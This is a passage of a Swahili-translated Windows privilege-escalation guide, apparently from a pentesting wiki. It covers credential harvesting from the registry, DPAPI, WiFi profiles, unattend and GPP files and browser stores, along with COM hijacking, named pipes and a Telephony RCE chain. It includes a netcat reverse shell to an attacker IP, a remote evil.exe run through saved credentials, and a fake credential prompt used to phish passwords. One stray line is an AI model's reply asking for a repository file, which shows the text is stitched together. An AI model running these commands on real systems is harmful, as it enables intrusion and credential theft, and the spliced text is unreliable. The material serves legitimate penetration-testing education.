Ikiwa una write permissions inside a folder present on PATH unaweza kuweza hijack a DLL loaded by a process na escalate privileges.

Kagua ruhusa za folda zote ndani ya PATH:

for %%A in ("%path:;=";"%") do ( cmd.exe /c icacls "%%~A" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && echo. )

Kwa habari zaidi kuhusu jinsi ya kuutumia vibaya ukaguzi huu:

Writable Sys Path +Dll Hijacking Privesc

Mtandao

Rasilimali zilizoshirikiwa

net view #Get a list of computers
net view /all /domain [domainname] #Shares on the domains
net view \\computer /ALL #List shares of a computer
net use x: \\computer\share #Mount the share locally
net share #Check current shares

hosts file

Angalia kompyuta nyingine zinazojulikana zilizo hardcoded kwenye hosts file

type C:\Windows\System32\drivers\etc\hosts

Kiolesura za Mtandao & DNS

ipconfig /all
Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
Get-DnsClientServerAddress -AddressFamily IPv4 | ft

Open Ports

Kagua uwepo wa huduma zilizo na vikwazo kutoka nje

netstat -ano #Opened ports?

Jedwali la Routing

route print
Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex

ARP Table

arp -A
Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,L

Firewall Rules

Angalia ukurasa huu kwa Firewall related commands (list rules, create rules, turn off, turn off…)

Zaidi commands for network enumeration hapa

Windows Subsystem for Linux (wsl)

C:\Windows\System32\bash.exe
C:\Windows\System32\wsl.exe

Fayili ya binary bash.exe pia inaweza kupatikana katika C:\Windows\WinSxS\amd64_microsoft-windows-lxssbash_[...]\bash.exe

Ikiwa utapata root user unaweza kusikiliza kwenye port yoyote (kwa mara ya kwanza unapotumia nc.exe kusikiliza kwenye port itakuuliza kupitia GUI kama nc inapaswa kuruhusiwa na firewall).

wsl whoami
./ubuntun1604.exe config --default-user root
wsl whoami
wsl python -c 'BIND_OR_REVERSE_SHELL_PYTHON_CODE'

Ili kuanzisha bash kama root kwa urahisi, unaweza kujaribu --default-user root

Unaweza kuchunguza mfumo wa faili wa WSL kwenye folda C:\Users\%USERNAME%\AppData\Local\Packages\CanonicalGroupLimited.UbuntuonWindows_79rhkp1fndgsc\LocalState\rootfs\

Taarifa za kuingia za Windows

Taarifa za kuingia za Winlogon

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr /i "DefaultDomainName DefaultUserName DefaultPassword AltDefaultDomainName AltDefaultUserName AltDefaultPassword LastUsedUsername"

#Other way
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultDomainName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AltDefaultDomainName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AltDefaultUserName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AltDefaultPassword

Meneja wa Credentials / Windows vault

From https://www.neowin.net/news/windows-7-exploring-credential-manager-and-windows-vault
Windows Vault inahifadhi sifa za kuingia za watumiaji kwa seva, tovuti na programu nyingine ambazo Windows inaweza kuingia kwa watumiaji moja kwa moja. Kwa mwanzo, inaweza kuonekana kama watumiaji wanaweza kuhifadhi sifa zao za Facebook, Twitter, Gmail n.k., ili wajingie moja kwa moja kupitia vivinjari. Lakini si hivyo.

Windows Vault inahifadhi sifa za kuingia ambazo Windows inaweza kutumia kuingia kwa watumiaji moja kwa moja, ambayo inamaanisha kwamba programu yoyote ya Windows inayohitaji sifa za kuingia ili kufikia rasilimali (server au tovuti) inaweza kutumia Credential Manager hii & Windows Vault na kutumia sifa za kuingia zilizotolewa badala ya watumiaji kuingiza username na password kila wakati.

Isipokuwa programu zinashirikiana na Credential Manager, sidhani zinaweza kutumia sifa za kuingia za rasilimali fulani. Kwa hiyo, ikiwa programu yako inataka kutumia vault, inapaswa kwa namna fulani kuwasiliana na credential manager na kuomba sifa za kuingia za rasilimali hiyo kutoka kwenye default storage vault.

Tumia cmdkey kuorodhesha sifa za kuingia zilizohifadhiwa kwenye mashine.

cmdkey /list
Currently stored credentials:
Target: Domain:interactive=WORKGROUP\Administrator
Type: Domain Password
User: WORKGROUP\Administrator

Kisha unaweza kutumia runas kwa chaguo la /savecred ili kutumia taarifa za kuingia zilizohifadhiwa. Mfano ufuatao unaitisha binary ya mbali kupitia SMB share.

runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe"

Kutumia runas kwa seti ya nyaraka za uthibitisho zilizotolewa.

C:\Windows\System32\runas.exe /env /noprofile /user:<username> <password> "c:\users\Public\nc.exe -nc <attacker-ip> 4444 -e cmd.exe"

Kumbuka kwamba mimikatz, lazagne, credentialfileview, VaultPasswordView, au kutoka Empire Powershells module.

DPAPI

The Data Protection API (DPAPI) provides a method for symmetric encryption of data, predominantly used within the Windows operating system for the symmetric encryption of asymmetric private keys. This encryption leverages a user or system secret to significantly contribute to entropy.

DPAPI enables the encryption of keys through a symmetric key that is derived from the user’s login secrets. In scenarios involving system encryption, it utilizes the system’s domain authentication secrets.

Encrypted user RSA keys, by using DPAPI, are stored in the %APPDATA%\Microsoft\Protect\{SID} directory, where {SID} represents the user’s Security Identifier. DPAPI key, iliyopo pamoja na funguo kuu zinazolinda funguo binafsi za mtumiaji katika faili ile ile, kawaida hujumuisha 64 bytes za data isiyotabirika. (Ni muhimu kutambua kwamba ufikiaji wa saraka hii umewekwa vizingiti, ukizuia kuorodhesha yaliyomo kwa kutumia amri ya dir katika CMD, ingawa yanaweza kuorodheshwa kupitia PowerShell).

Get-ChildItem  C:\Users\USER\AppData\Roaming\Microsoft\Protect\
Get-ChildItem  C:\Users\USER\AppData\Local\Microsoft\Protect\

Unaweza kutumia mimikatz module dpapi::masterkey kwa vigezo vinavyofaa (/pvk au /rpc) ili kuidekripti.

Faili za credentials files protected by the master password kwa kawaida hupatikana katika:

dir C:\Users\username\AppData\Local\Microsoft\Credentials\
dir C:\Users\username\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\username\AppData\Local\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\username\AppData\Roaming\Microsoft\Credentials\

Unaweza kutumia mimikatz module dpapi::cred na /masterkey inayofaa ili decrypt.
Unaweza extract masterkeys nyingi za DPAPI kutoka memory kwa kutumia module sekurlsa::dpapi (ikiwa wewe ni root).

DPAPI - Extracting Passwords

PowerShell Credentials

PowerShell credentials mara nyingi hutumika kwa ajili ya scripting na kazi za automation kama njia ya kuhifadhi encrypted credentials kwa urahisi. Nyaraka hizi zinalindwa kwa kutumia DPAPI, ambayo kwa kawaida ina maana kwamba zinaweza tu kufunguliwa/decrypted na mtumiaji yuleyule kwenye kompyuta ileile zilipoundwa.

Ili decrypt PS credentials kutoka kwa faili inayoiweka unaweza kufanya:

PS C:\> $credential = Import-Clixml -Path 'C:\pass.xml'
PS C:\> $credential.GetNetworkCredential().username

john

PS C:\htb> $credential.GetNetworkCredential().password

JustAPWD!

Wifi

#List saved Wifi using
netsh wlan show profile
#To get the clear-text password use
netsh wlan show profile <SSID> key=clear
#Oneliner to extract all wifi passwords
cls & echo. & for /f "tokens=3,* delims=: " %a in ('netsh wlan show profiles ^| find "Profile "') do @echo off > nul & (netsh wlan show profiles name="%b" key=clear | findstr "SSID Cipher Content" | find /v "Number" & echo.) & @echo on*

Miunganisho ya RDP zilizohifadhiwa

Unaweza kuzipata kwenye HKEY_USERS\<SID>\Software\Microsoft\Terminal Server Client\Servers\
na katika HKCU\Software\Microsoft\Terminal Server Client\Servers\

Amri zilizotekelezwa hivi karibuni

HCU\<SID>\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
HKCU\<SID>\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU

Meneja wa Cheti za Remote Desktop

%localappdata%\Microsoft\Remote Desktop Connection Manager\RDCMan.settings

Tumia Mimikatz dpapi::rdg module na /masterkey inayofaa ili decrypt any .rdg files
Unaweza extract many DPAPI masterkeys kutoka kwenye memory kwa kutumia Mimikatz sekurlsa::dpapi module

Sticky Notes

Watu mara nyingi hutumia StickyNotes app kwenye Windows workstations ili save passwords na taarifa nyingine, bila kutambua kuwa ni faili ya database. Faili hii iko katika C:\Users\<user>\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite na inastahili daima kutafutwa na kuchunguzwa.

AppCmd.exe

Kumbuka kwamba ili recover passwords kutoka AppCmd.exe unahitaji kuwa Administrator na kukimbia chini ya High Integrity level.
AppCmd.exe iko katika directory %systemroot%\system32\inetsrv\.\
Ikiwa faili hii ipo basi inawezekana kuwa baadhi ya credentials zimetengenezwa na zinaweza kuweza recovered.

Msimbo huu umetolewa kutoka kwa PowerUP:

function Get-ApplicationHost {
$OrigError = $ErrorActionPreference
$ErrorActionPreference = "SilentlyContinue"

# Check if appcmd.exe exists
if (Test-Path  ("$Env:SystemRoot\System32\inetsrv\appcmd.exe")) {
# Create data table to house results
$DataTable = New-Object System.Data.DataTable

# Create and name columns in the data table
$Null = $DataTable.Columns.Add("user")
$Null = $DataTable.Columns.Add("pass")
$Null = $DataTable.Columns.Add("type")
$Null = $DataTable.Columns.Add("vdir")
$Null = $DataTable.Columns.Add("apppool")

# Get list of application pools
Invoke-Expression "$Env:SystemRoot\System32\inetsrv\appcmd.exe list apppools /text:name" | ForEach-Object {

# Get application pool name
$PoolName = $_

# Get username
$PoolUserCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list apppool " + "`"$PoolName`" /text:processmodel.username"
$PoolUser = Invoke-Expression $PoolUserCmd

# Get password
$PoolPasswordCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list apppool " + "`"$PoolName`" /text:processmodel.password"
$PoolPassword = Invoke-Expression $PoolPasswordCmd

# Check if credentials exists
if (($PoolPassword -ne "") -and ($PoolPassword -isnot [system.array])) {
# Add credentials to database
$Null = $DataTable.Rows.Add($PoolUser, $PoolPassword,'Application Pool','NA',$PoolName)
}
}

# Get list of virtual directories
Invoke-Expression "$Env:SystemRoot\System32\inetsrv\appcmd.exe list vdir /text:vdir.name" | ForEach-Object {

# Get Virtual Directory Name
$VdirName = $_

# Get username
$VdirUserCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list vdir " + "`"$VdirName`" /text:userName"
$VdirUser = Invoke-Expression $VdirUserCmd

# Get password
$VdirPasswordCmd = "$Env:SystemRoot\System32\inetsrv\appcmd.exe list vdir " + "`"$VdirName`" /text:password"
$VdirPassword = Invoke-Expression $VdirPasswordCmd

# Check if credentials exists
if (($VdirPassword -ne "") -and ($VdirPassword -isnot [system.array])) {
# Add credentials to database
$Null = $DataTable.Rows.Add($VdirUser, $VdirPassword,'Virtual Directory',$VdirName,'NA')
}
}

# Check if any passwords were found
if( $DataTable.rows.Count -gt 0 ) {
# Display results in list view that can feed into the pipeline
$DataTable |  Sort-Object type,user,pass,vdir,apppool | Select-Object user,pass,type,vdir,apppool -Unique
}
else {
# Status user
Write-Verbose 'No application pool or virtual directory passwords were found.'
$False
}
}
else {
Write-Verbose 'Appcmd.exe does not exist in the default location.'
$False
}
$ErrorActionPreference = $OrigError
}

SCClient / SCCM

Angalia ikiwa C:\Windows\CCM\SCClient.exe inapatikana .
Wasakinishaji huendeshwa kwa SYSTEM privileges, mengi yanaweza kuathiriwa na DLL Sideloading (Taarifa kutoka https://github.com/enjoiz/Privesc).

$result = Get-WmiObject -Namespace "root\ccm\clientSDK" -Class CCM_Application -Property * | select Name,SoftwareVersion
if ($result) { $result }
else { Write "Not Installed." }

Faili na Registry (Credentials)

Putty Creds

reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s | findstr "HKEY_CURRENT_USER HostName PortNumber UserName PublicKeyFile PortForwardings ConnectionSharing ProxyPassword ProxyUsername" #Check the values saved in each session, user/password could be there

Putty SSH Vifunguo vya Mwenyeji

reg query HKCU\Software\SimonTatham\PuTTY\SshHostKeys\

SSH keys katika registry

SSH private keys zinaweza kuhifadhiwa ndani ya registry key HKCU\Software\OpenSSH\Agent\Keys hivyo unapaswa kuangalia ikiwa kuna kitu cha kuvutia huko:

reg query 'HKEY_CURRENT_USER\Software\OpenSSH\Agent\Keys'

Ikiwa utapata rekodi yoyote ndani ya njia hiyo, kuna uwezekano ni ufunguo wa SSH uliohifadhiwa. Imehifadhiwa encrypted lakini inaweza kufichuliwa kwa urahisi kwa kutumia https://github.com/ropnop/windows_sshagent_extract.
Taarifa zaidi kuhusu mbinu hii hapa: https://blog.ropnop.com/extracting-ssh-private-keys-from-windows-10-ssh-agent/

Ikiwa huduma ya ssh-agent haifanyi kazi na unataka ianze moja kwa moja wakati wa boot, endesha:

Get-Service ssh-agent | Set-Service -StartupType Automatic -PassThru | Start-Service

Tip

Inaonekana mbinu hii haifanyi kazi tena. Nilijaribu kuunda baadhi ya ssh keys, kuzipakia kwa ssh-add na kuingia kwa ssh kwenye mashine. Registry HKCU\Software\OpenSSH\Agent\Keys haipo na procmon hakutambua matumizi ya dpapi.dll wakati wa uthibitishaji wa funguo asimetriki.

Faili zisizoangaliwa

C:\Windows\sysprep\sysprep.xml
C:\Windows\sysprep\sysprep.inf
C:\Windows\sysprep.inf
C:\Windows\Panther\Unattended.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\Panther\Unattend\Unattended.xml
C:\Windows\System32\Sysprep\unattend.xml
C:\Windows\System32\Sysprep\unattended.xml
C:\unattend.txt
C:\unattend.inf
dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul

Unaweza pia kutafuta mafaili haya kwa kutumia metasploit: post/windows/gather/enum_unattend

Mfano wa yaliyomo:

<component name="Microsoft-Windows-Shell-Setup" publicKeyToken="31bf3856ad364e35" language="neutral" versionScope="nonSxS" processorArchitecture="amd64">
<AutoLogon>
<Password>U2VjcmV0U2VjdXJlUGFzc3dvcmQxMjM0Kgo==</Password>
<Enabled>true</Enabled>
<Username>Administrateur</Username>
</AutoLogon>

<UserAccounts>
<LocalAccounts>
<LocalAccount wcm:action="add">
<Password>*SENSITIVE*DATA*DELETED*</Password>
<Group>administrators;users</Group>
<Name>Administrateur</Name>
</LocalAccount>
</LocalAccounts>
</UserAccounts>

Chelezo za SAM & SYSTEM

# Usually %SYSTEMROOT% = C:\Windows
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
%SYSTEMROOT%\System32\config\SAM
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\SYSTEM
%SYSTEMROOT%\System32\config\RegBack\system

Vyeti vya Cloud

#From user home
.aws\credentials
AppData\Roaming\gcloud\credentials.db
AppData\Roaming\gcloud\legacy_credentials
AppData\Roaming\gcloud\access_tokens.db
.azure\accessTokens.json
.azure\azureProfile.json

McAfee SiteList.xml

Tafuta faili iitwayo SiteList.xml

Nywila ya GPP Iliyohifadhiwa

Kipengele kilikuwepo hapo awali kiliruhusu utumaji wa akaunti za local administrator zilizotengenezwa kwenye kundi la mashine kupitia Group Policy Preferences (GPP). Hata hivyo, njia hii ilikuwa na mapungufu makubwa ya usalama. Kwanza, Group Policy Objects (GPOs), zinazohifadhiwa kama faili za XML kwenye SYSVOL, zingeweza kufikiwa na mtumiaji yeyote wa domain. Pili, nywila zilizo ndani ya GPP hizi, zilizosimbwa kwa AES256 kwa kutumia ufunguo wa chaguomsingi uliotangazwa hadharani, zingeweza kufunguliwa na mtumiaji yeyote aliyethibitishwa. Hii ilisababisha hatari kubwa, kwani ingeweza kumruhusu mtumiaji kupata ruhusa za juu.

Ili kupunguza hatari hii, ilitengenezwa function inayotafuta faili za GPP zilizohifadhiwa kwa ndani (locally cached) ambazo zina shamba la “cpassword” ambalo si tupu. Ikipata faili kama hiyo, function huifungua nywila na kurudisha custom PowerShell object. Object hii inajumuisha maelezo kuhusu GPP na eneo la faili, kusaidia kutambua na kurekebisha ugumu huu wa usalama.

Tafuta katika C:\ProgramData\Microsoft\Group Policy\history au katika C:\Documents and Settings\All Users\Application Data\Microsoft\Group Policy\history (previous to W Vista) kwa faili zifuatazo:

Groups.xml
Services.xml
Scheduledtasks.xml
DataSources.xml
Printers.xml
Drives.xml

Ili kufungua cPassword:

#To decrypt these passwords you can decrypt it using
gpp-decrypt j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw

Kutumia crackmapexec kupata nywila:

crackmapexec smb 10.10.10.10 -u username -p pwd -M gpp_autologin

IIS Web Config

Get-Childitem –Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
C:\inetpub\wwwroot\web.config

Get-Childitem –Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue
Get-Childitem –Path C:\xampp\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue

Mfano wa web.config yenye credentials:

<authentication mode="Forms">
<forms name="login" loginUrl="/admin">
<credentials passwordFormat = "Clear">
<user name="Administrator" password="SuperAdminPassword" />
</credentials>
</forms>
</authentication>

OpenVPN maelezo ya kuingia

Add-Type -AssemblyName System.Security
$keys = Get-ChildItem "HKCU:\Software\OpenVPN-GUI\configs"
$items = $keys | ForEach-Object {Get-ItemProperty $_.PsPath}

foreach ($item in $items)
{
$encryptedbytes=$item.'auth-data'
$entropy=$item.'entropy'
$entropy=$entropy[0..(($entropy.Length)-2)]

$decryptedbytes = [System.Security.Cryptography.ProtectedData]::Unprotect(
$encryptedBytes,
$entropy,
[System.Security.Cryptography.DataProtectionScope]::CurrentUser)

Write-Host ([System.Text.Encoding]::Unicode.GetString($decryptedbytes))
}

Logs

# IIS
C:\inetpub\logs\LogFiles\*

#Apache
Get-Childitem –Path C:\ -Include access.log,error.log -File -Recurse -ErrorAction SilentlyContinue

Omba credentials

Unaweza kila wakati kumwomba mtumiaji kuingiza credentials zake au hata credentials za mtumiaji mwingine ikiwa unadhani anaweza kuzijua (kumbuka kwamba kuomba mteja moja kwa moja kwa credentials ni hatari sana):

$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName+'\'+[Environment]::UserName,[Environment]::UserDomainName); $cred.getnetworkcredential().password
$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName+'\'+'anotherusername',[Environment]::UserDomainName); $cred.getnetworkcredential().password

#Get plaintext
$cred.GetNetworkCredential() | fl

Majina ya faili yanayoweza kuwa na credentials

Faili zinazo julikana ambazo wakati fulani ziliwahi kuwa na passwords kwa clear-text au Base64

$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history
vnc.ini, ultravnc.ini, *vnc*
web.config
php.ini httpd.conf httpd-xampp.conf my.ini my.cnf (XAMPP, Apache, PHP)
SiteList.xml #McAfee
ConsoleHost_history.txt #PS-History
*.gpg
*.pgp
*config*.php
elasticsearch.y*ml
kibana.y*ml
*.p12
*.der
*.csr
*.cer
known_hosts
id_rsa
id_dsa
*.ovpn
anaconda-ks.cfg
hostapd.conf
rsyncd.conf
cesi.conf
supervisord.conf
tomcat-users.xml
*.kdbx
KeePass.config
Ntds.dit
SAM
SYSTEM
FreeSSHDservice.ini
access.log
error.log
server.xml
ConsoleHost_history.txt
setupinfo
setupinfo.bak
key3.db         #Firefox
key4.db         #Firefox
places.sqlite   #Firefox
"Login Data"    #Chrome
Cookies         #Chrome
Bookmarks       #Chrome
History         #Chrome
TypedURLsTime   #IE
TypedURLs       #IE
%SYSTEMDRIVE%\pagefile.sys
%WINDIR%\debug\NetSetup.log
%WINDIR%\repair\sam
%WINDIR%\repair\system
%WINDIR%\repair\software, %WINDIR%\repair\security
%WINDIR%\iis6.log
%WINDIR%\system32\config\AppEvent.Evt
%WINDIR%\system32\config\SecEvent.Evt
%WINDIR%\system32\config\default.sav
%WINDIR%\system32\config\security.sav
%WINDIR%\system32\config\software.sav
%WINDIR%\system32\config\system.sav
%WINDIR%\system32\CCM\logs\*.log
%USERPROFILE%\ntuser.dat
%USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat

I don’t have access to your repository. Please paste the contents of src/windows-hardening/windows-local-privilege-escalation/README.md here (or grant access), and I will translate the English text to Swahili while preserving markdown, code, links, refs and tags per your rules.

cd C:\
dir /s/b /A:-D RDCMan.settings == *.rdg == *_history* == httpd.conf == .htpasswd == .gitconfig == .git-credentials == Dockerfile == docker-compose.yml == access_tokens.db == accessTokens.json == azureProfile.json == appcmd.exe == scclient.exe == *.gpg$ == *.pgp$ == *config*.php == elasticsearch.y*ml == kibana.y*ml == *.p12$ == *.cer$ == known_hosts == *id_rsa* == *id_dsa* == *.ovpn == tomcat-users.xml == web.config == *.kdbx == KeePass.config == Ntds.dit == SAM == SYSTEM == security == software == FreeSSHDservice.ini == sysprep.inf == sysprep.xml == *vnc*.ini == *vnc*.c*nf* == *vnc*.txt == *vnc*.xml == php.ini == https.conf == https-xampp.conf == my.ini == my.cnf == access.log == error.log == server.xml == ConsoleHost_history.txt == pagefile.sys == NetSetup.log == iis6.log == AppEvent.Evt == SecEvent.Evt == default.sav == security.sav == software.sav == system.sav == ntuser.dat == index.dat == bash.exe == wsl.exe 2>nul | findstr /v ".dll"

Get-Childitem –Path C:\ -Include *unattend*,*sysprep* -File -Recurse -ErrorAction SilentlyContinue | where {($_.Name -like "*.xml" -or $_.Name -like "*.txt" -or $_.Name -like "*.ini")}

Credentials katika RecycleBin

Unapaswa pia kuangalia Bin kutafuta credentials ndani yake

Ili recover passwords zilizohifadhiwa na programu kadhaa unaweza kutumia: http://www.nirsoft.net/password_recovery_tools.html

Ndani ya registry

Vifunguo vingine vya registry vinavyowezekana zenye credentials

reg query "HKCU\Software\ORL\WinVNC3\Password"
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP" /s
reg query "HKCU\Software\TightVNC\Server"
reg query "HKCU\Software\OpenSSH\Agent\Key"

Extract openssh keys from registry.

Historia za vivinjari

Unapaswa kuangalia dbs ambapo nywila za Chrome or Firefox zinahifadhiwa.
Pia angalia historia, bookmarks na favourites za vivinjari kwani huenda baadhi ya nywila zimetunzwa humo.

Tools to extract passwords from browsers:

Mimikatz: dpapi::chrome
SharpWeb
SharpChromium
SharpDPAPI

COM DLL Overwriting

Component Object Model (COM) ni teknolojia iliyojengwa ndani ya mfumo wa uendeshaji wa Windows inayoruhusu intercommunication kati ya vipengele vya programu vinavyotumiwa kwa lugha tofauti. Kila kipengele cha COM kinatambulika via class ID (CLSID) na kila kipengele hutoa utendakazi kupitia interface moja au zaidi, zinazotambulika kwa interface IDs (IIDs).

COM classes and interfaces are defined in the registry under HKEY\CLASSES\ROOT\CLSID and HKEY\CLASSES\ROOT\Interface respectively. This registry is created by merging the HKEY\LOCAL\MACHINE\Software\Classes + HKEY\CURRENT\USER\Software\Classes = HKEY\CLASSES\ROOT.

Ndani ya CLSIDs za registry hii utaona registry tanzu InProcServer32 ambayo ina default value inayoonyesha kwenye DLL na thamani iitwayo ThreadingModel ambayo inaweza kuwa Apartment (Single-Threaded), Free (Multi-Threaded), Both (Single or Multi) au Neutral (Thread Neutral).

Basically, if you can overwrite any of the DLLs that are going to be executed, you could escalate privileges if that DLL is going to be executed by a different user.

Ili kujifunza jinsi attackers wanavyotumia COM Hijacking kama persistence mechanism, angalia:

COM Hijacking

Utafutaji wa nywila kwa ujumla katika faili na registry

Tafuta yaliyomo kwenye faili

cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt
findstr /si password *.xml *.ini *.txt *.config
findstr /spin "password" *.*

Tafuta faili lenye jina fulani

dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
where /R C:\ user.txt
where /R C:\ *.ini

Tafuta kwenye rejista majina ya funguo na nywila

REG QUERY HKLM /F "password" /t REG_SZ /S /K
REG QUERY HKCU /F "password" /t REG_SZ /S /K
REG QUERY HKLM /F "password" /t REG_SZ /S /d
REG QUERY HKCU /F "password" /t REG_SZ /S /d

Zana zinazotafuta passwords

MSF-Credentials Plugin ni plugin ya msf niliitengeneza plugin hii ili kuendesha moja kwa moja kila metasploit POST module inayotafuta credentials ndani ya mwathirika.
Winpeas inatafuta moja kwa moja faili zote zenye passwords zilizotajwa kwenye ukurasa huu.
Lazagne ni zana nyingine nzuri ya kutoa password kutoka kwenye system.

Zana SessionGopher inatafuta sessions, usernames na passwords za zana kadhaa ambazo huhifadhi data hii kwa maandishi wazi (PuTTY, WinSCP, FileZilla, SuperPuTTY, and RDP)

Import-Module path\to\SessionGopher.ps1;
Invoke-SessionGopher -Thorough
Invoke-SessionGopher -AllDomain -o
Invoke-SessionGopher -AllDomain -u domain.com\adm-arvanaghi -p s3cr3tP@ss

Leaked Handlers

Fikiria kwamba mchakato unaoendesha kama SYSTEM unafungua mchakato mpya (OpenProcess()) akiwa na full access. Mchakato huo huo pia huunda mchakato mpya (CreateProcess()) ule wenye ruhusa ndogo lakini unaorithi open handles zote za mchakato mkuu.
Kisha, ikiwa una full access kwa mchakato wenye ruhusa ndogo, unaweza kunyakua open handle ya mchakato wenye ruhusa iliyoundwa kwa OpenProcess() na kuingiza shellcode.
Soma mfano huu kwa maelezo zaidi kuhusu jinsi ya kugundua na kutumia udhaifu huu.
Soma pia posti hii nyingine kwa maelezo kamili zaidi juu ya jinsi ya kujaribu na kutumia open handlers za mchakato na threads zilizoorodheshwa na viwango tofauti vya ruhusa (si tu full access).

Named Pipe Client Impersonation

Shared memory segments, referred to as pipes, huwezesha mawasiliano kati ya mchakato na uhamishaji wa data.

Windows inatoa kipengele kinachoitwa Named Pipes, kuruhusu mchakato zisizohusiana kushiriki data, hata kwa mitandao tofauti. Hii inafanana na usanifu wa client/server, ambapo majukumu yameelezwa kama named pipe server na named pipe client.

Wakati data inapotumwa kupitia pipe na client, server iliyoweka pipe ina uwezo wa kujichukua utambulisho wa client, ukibakiza kama ina haki za SeImpersonate. Kutambua mchakato wenye ruhusa unaowasiliana kupitia pipe ambao unaweza kuiga hukupa fursa ya kupata ruhusa za juu zaidi kwa kuchukua utambulisho wa mchakato huo mara itakaposhirikiana na pipe uliyoweka. Kwa maagizo ya jinsi ya kutekeleza aina hii ya shambulio, mwongozo wa msaada unapatikana hapa na hapa.

Vilevile zana zifuatazo zinakuwezesha kuingilia mawasiliano ya named pipe kwa tool kama burp: https://github.com/gabriel-sztejnworcel/pipe-intercept na zana hii inakuwezesha kuorodhesha na kuona pipes zote ili kutafuta privescs https://github.com/cyberark/PipeViewer

Telephony tapsrv remote DWORD write to RCE

Huduma ya Telephony (TapiSrv) katika mode ya server inaonyesha \\pipe\\tapsrv (MS-TRP). Client iliyothibitishwa kwa mbali inaweza kutumia njia ya matukio ya async inayotumia mailslot kubadilisha ClientAttach kuwa uandishi wa kiholela wa 4-byte kwenye faili yoyote iliyopo inayoweza kuandikwa na NETWORK SERVICE, kisha kupata haki za admin za Telephony na kupakia DLL ya kiholela kama service. Mtiririko kamili:

ClientAttach na pszDomainUser kuwekwa kwa path iliyopo inayoweza kuandikwa → huduma inafungua kupitia CreateFileW(..., OPEN_EXISTING) na kuitumia kwa uandishi wa matukio ya async.
Kila tukio linaandika InitContext inayodhibitiwa na mshambuliaji kutoka Initialize kwenye handle hiyo. Sajili line app kwa LRegisterRequestRecipient (Req_Func 61), chochea TRequestMakeCall (Req_Func 121), chukua kupitia GetAsyncEvents (Req_Func 0), kisha unregister/shutdown kurudia uandishi wa deterministic.
Jumuisha mwenyewe katika [TapiAdministrators] katika C:\\Windows\\TAPI\\tsec.ini, ungana tena, kisha piga GetUIDllName na path ya DLL ya kiholela ili kutekeleza TSPI_providerUIIdentify kama NETWORK SERVICE.

Maelezo zaidi:

Telephony Tapsrv Arbitrary Dword Write To Rce

Mengine

File Extensions that could execute stuff in Windows

Angalia ukurasa https://filesec.io/

Monitoring Command Lines for passwords

Unapopata shell kama user, kunaweza kuwa na scheduled tasks au mchakato mwingine unaotekelezwa ambao hupuuzia credentials kwenye command line. Script ifuatayo inakamata process command lines kila sekunde mbili na kulinganisha hali ya sasa na hali ya awali, ikitoa tofauti yoyote.

while($true)
{
$process = Get-WmiObject Win32_Process | Select-Object CommandLine
Start-Sleep 1
$process2 = Get-WmiObject Win32_Process | Select-Object CommandLine
Compare-Object -ReferenceObject $process -DifferenceObject $process2
}

Kuchukua nywila kutoka kwa michakato

Kutoka kwa Mtumiaji mwenye vibali vya chini hadi NT\AUTHORITY SYSTEM (CVE-2019-1388) / UAC Bypass

Ikiwa una ufikiaji wa kiolesura cha picha (kupitia console au RDP) na UAC imewezeshwa, katika baadhi ya toleo za Microsoft Windows inawezekana kuendesha terminal au mchakato mwingine wowote kama “NT\AUTHORITY SYSTEM” kutoka kwa mtumiaji asiye na vibali.

Hii inafanya iwezekane kukuza vibali na bypass UAC kwa wakati mmoja kwa udhaifu huo huo. Zaidi ya hayo, hakuna haja ya kusakinisha chochote na binary inayotumika wakati wa mchakato imewekwa saini na kutolewa na Microsoft.

Baadhi ya mifumo iliyoathiriwa ni zifuatazo:

SERVER
======

Windows 2008r2	7601	** link OPENED AS SYSTEM **
Windows 2012r2	9600	** link OPENED AS SYSTEM **
Windows 2016	14393	** link OPENED AS SYSTEM **
Windows 2019	17763	link NOT opened


WORKSTATION
===========

